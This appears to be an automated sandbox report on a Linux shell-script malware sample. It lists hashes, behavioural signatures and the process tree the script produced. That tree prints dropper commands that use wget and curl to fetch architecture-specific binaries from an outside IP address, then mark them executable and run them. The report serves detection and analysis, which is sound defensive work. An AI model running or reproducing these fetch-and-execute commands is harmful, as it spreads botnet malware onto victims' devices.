Analysis

  • max time kernel
    26s
  • max time network
    64s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    24/11/2024, 01:19

General

  • Target

    1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh

  • Size

    1KB

  • MD5

    513641f5f60d55559c2060489de6d605

  • SHA1

    c95feec2255732b60d434b0639b88a5cff205ea0

  • SHA256

    1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd

  • SHA512

    71ee20fe10e58b1d9a0e0e5268ba264e35e15e3a5190cfdf5950245579fbbdabd9aef7dc11e9398e0df8add1afb1400a0134911b6ebb9deb937b578fc52775e0

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 10 IoCs
  • Checks CPU configuration 1 TTPs 10 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 20 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
    /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
    1⤵
    • Writes file to tmp directory
    PID:659
    • /usr/bin/wget
      wget http://89.22.230.162/bins/UnHAnaAW.x86
      2⤵
        PID:661
      • /usr/bin/curl
        curl -O http://89.22.230.162/bins/UnHAnaAW.x86
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        PID:673
      • /bin/cat
        cat UnHAnaAW.x86
        2⤵
          PID:688
        • /bin/chmod
          chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF
          2⤵
          • File and Directory Permissions Modification
          PID:689
        • /tmp/3AvA
          ./3AvA x86
          2⤵
          • Executes dropped EXE
          PID:690
        • /usr/bin/wget
          wget http://89.22.230.162/bins/UnHAnaAW.mips
          2⤵
          • System Network Configuration Discovery
          PID:692
        • /usr/bin/curl
          curl -O http://89.22.230.162/bins/UnHAnaAW.mips
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          PID:693
        • /bin/cat
          cat UnHAnaAW.mips
          2⤵
          • System Network Configuration Discovery
          PID:708
        • /bin/chmod
          chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF
          2⤵
          • File and Directory Permissions Modification
          PID:710
        • /tmp/3AvA
          ./3AvA mips
          2⤵
          • Executes dropped EXE
          • System Network Configuration Discovery
          PID:711
        • /usr/bin/wget
          wget http://89.22.230.162/bins/UnHAnaAW.mpsl
          2⤵
            PID:714
          • /usr/bin/curl
            curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            PID:718
          • /bin/cat
            cat UnHAnaAW.mpsl
            2⤵
              PID:740
            • /bin/chmod
              chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF
              2⤵
              • File and Directory Permissions Modification
              PID:741
            • /tmp/3AvA
              ./3AvA mpsl
              2⤵
              • Executes dropped EXE
              PID:743
            • /usr/bin/wget
              wget http://89.22.230.162/bins/UnHAnaAW.arm4
              2⤵
                PID:747
              • /usr/bin/curl
                curl -O http://89.22.230.162/bins/UnHAnaAW.arm4
                2⤵
                • Checks CPU configuration
                • Reads runtime system information
                PID:752
              • /bin/cat
                cat UnHAnaAW.arm4
                2⤵
                  PID:760
                • /bin/chmod
                  chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF
                  2⤵
                  • File and Directory Permissions Modification
                  PID:761
                • /tmp/3AvA
                  ./3AvA arm4
                  2⤵
                  • Executes dropped EXE
                  PID:762
                • /usr/bin/wget
                  wget http://89.22.230.162/bins/UnHAnaAW.arm5
                  2⤵
                    PID:765
                  • /usr/bin/curl
                    curl -O http://89.22.230.162/bins/UnHAnaAW.arm5
                    2⤵
                    • Checks CPU configuration
                    • Reads runtime system information
                    PID:769
                  • /bin/cat
                    cat UnHAnaAW.arm5
                    2⤵
                      PID:790
                    • /bin/chmod
                      chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF
                      2⤵
                      • File and Directory Permissions Modification
                      PID:791
                    • /tmp/3AvA
                      ./3AvA arm5
                      2⤵
                      • Executes dropped EXE
                      PID:792
                    • /usr/bin/wget
                      wget http://89.22.230.162/bins/UnHAnaAW.arm6
                      2⤵
                        PID:794
                      • /usr/bin/curl
                        curl -O http://89.22.230.162/bins/UnHAnaAW.arm6
                        2⤵
                        • Checks CPU configuration
                        • Reads runtime system information
                        PID:795
                      • /bin/cat
                        cat UnHAnaAW.arm6
                        2⤵
                          PID:796
                        • /bin/chmod
                          chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF
                          2⤵
                          • File and Directory Permissions Modification
                          PID:797
                        • /tmp/3AvA
                          ./3AvA arm6
                          2⤵
                          • Executes dropped EXE
                          PID:798
                        • /usr/bin/wget
                          wget http://89.22.230.162/bins/UnHAnaAW.arm7
                          2⤵
                            PID:800
                          • /usr/bin/curl
                            curl -O http://89.22.230.162/bins/UnHAnaAW.arm7
                            2⤵
                            • Checks CPU configuration
                            • Reads runtime system information
                            PID:801
                          • /bin/cat
                            cat UnHAnaAW.arm7
                            2⤵
                              PID:802
                            • /bin/chmod
                              chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF
                              2⤵
                              • File and Directory Permissions Modification
                              PID:803
                            • /tmp/3AvA
                              ./3AvA arm7
                              2⤵
                              • Executes dropped EXE
                              PID:804
                            • /usr/bin/wget
                              wget http://89.22.230.162/bins/UnHAnaAW.ppc
                              2⤵
                                PID:806
                              • /usr/bin/curl
                                curl -O http://89.22.230.162/bins/UnHAnaAW.ppc
                                2⤵
                                • Checks CPU configuration
                                • Reads runtime system information
                                PID:807
                              • /bin/cat
                                cat UnHAnaAW.ppc
                                2⤵
                                  PID:808
                                • /bin/chmod
                                  chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:809
                                • /tmp/3AvA
                                  ./3AvA ppc
                                  2⤵
                                  • Executes dropped EXE
                                  PID:810
                                • /usr/bin/wget
                                  wget http://89.22.230.162/bins/UnHAnaAW.m68k
                                  2⤵
                                    PID:812
                                  • /usr/bin/curl
                                    curl -O http://89.22.230.162/bins/UnHAnaAW.m68k
                                    2⤵
                                    • Checks CPU configuration
                                    • Reads runtime system information
                                    PID:813
                                  • /bin/cat
                                    cat UnHAnaAW.m68k
                                    2⤵
                                      PID:814
                                    • /bin/chmod
                                      chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF
                                      2⤵
                                      • File and Directory Permissions Modification
                                      PID:815
                                    • /tmp/3AvA
                                      ./3AvA m68k
                                      2⤵
                                      • Executes dropped EXE
                                      PID:816
                                    • /usr/bin/wget
                                      wget http://89.22.230.162/bins/UnHAnaAW.sh4
                                      2⤵
                                        PID:818
                                      • /usr/bin/curl
                                        curl -O http://89.22.230.162/bins/UnHAnaAW.sh4
                                        2⤵
                                        • Checks CPU configuration
                                        • Reads runtime system information
                                        PID:821
                                      • /bin/cat
                                        cat UnHAnaAW.sh4
                                        2⤵
                                          PID:822
                                        • /bin/chmod
                                          chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF
                                          2⤵
                                          • File and Directory Permissions Modification
                                          PID:823
                                        • /tmp/3AvA
                                          ./3AvA sh4
                                          2⤵
                                          • Executes dropped EXE
                                          PID:824

                                      Network

                                      MITRE ATT&CK Enterprise v15

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads